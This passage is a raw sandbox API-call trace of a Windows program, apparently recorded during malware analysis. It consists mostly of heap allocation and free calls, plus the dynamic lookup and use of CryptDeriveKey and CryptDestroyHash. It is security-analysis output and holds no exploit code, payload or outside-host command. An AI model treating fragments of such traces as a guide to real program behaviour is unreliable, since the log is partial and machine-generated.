Flags=0x0, Size=0x10) returned 0x2e51e38 [0267.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0267.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0267.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0267.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0267.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0267.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0267.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0267.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55258 [0267.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0267.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0267.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0267.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551e8 [0267.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0267.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0267.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552a8 [0267.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0267.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0267.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55218 [0267.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0267.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0267.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.966] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0267.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0267.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0267.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0267.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0267.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0267.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0267.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0267.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0267.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0267.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0267.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0267.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0267.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0267.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0267.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0267.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0267.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0267.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0267.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0267.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0267.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0267.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0267.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0267.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0267.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0267.967] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0267.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0267.967] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0267.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0267.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0267.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0267.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0267.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0267.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0267.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0267.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0267.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0267.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0267.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0267.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0267.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0267.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0267.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0267.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0267.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0267.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0267.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0267.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0267.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0267.968] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0267.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0267.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0267.968] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0267.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0267.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0267.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0267.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51bc8 [0267.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51bc8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0267.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0267.969] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0267.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0267.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0267.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0267.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0267.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0267.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0267.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0267.969] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0267.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0267.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0267.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0267.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0267.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0267.969] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0267.969] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87490, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa86f50) returned 1 [0267.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14d28 [0267.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0267.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0267.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0267.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0267.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0267.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0267.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0267.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0267.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0267.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0267.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0267.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0267.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0267.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0267.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0267.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0267.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0267.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0267.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0267.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0267.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0267.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0267.970] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0267.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0267.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0267.970] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f28 [0267.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551d8 [0267.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f28 | out: hHeap=0x970000) returned 1 [0267.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551d8 | out: hHeap=0x970000) returned 1 [0267.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0267.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0267.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fb8 [0267.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521b0 [0267.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0267.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521b0 | out: hHeap=0x970000) returned 1 [0267.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fb8 | out: hHeap=0x970000) returned 1 [0267.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fb8 [0267.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0267.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51f58 [0267.971] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0267.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f58 | out: hHeap=0x970000) returned 1 [0267.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0267.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0267.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0267.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0267.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0267.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0267.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0267.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0267.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.971] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0267.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0267.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0267.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0267.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0267.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0267.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0267.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0267.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0267.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0267.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0267.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0267.972] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0267.972] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552d8 [0267.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552c8 [0267.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0267.972] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0267.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0267.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55228 [0267.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0267.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0267.973] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0267.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0267.973] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0267.973] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.973] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0267.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0267.974] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0267.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0267.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0267.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0267.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0267.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b88 [0267.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0267.974] CryptDestroyHash (hHash=0xa87490) returned 1 [0267.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15c40 [0267.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0267.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0267.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0267.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0267.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0267.974] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0267.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0267.974] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0267.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0267.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0267.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0267.975] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15c40 | out: hHeap=0x970000) returned 1 [0267.975] HeapFree (in: 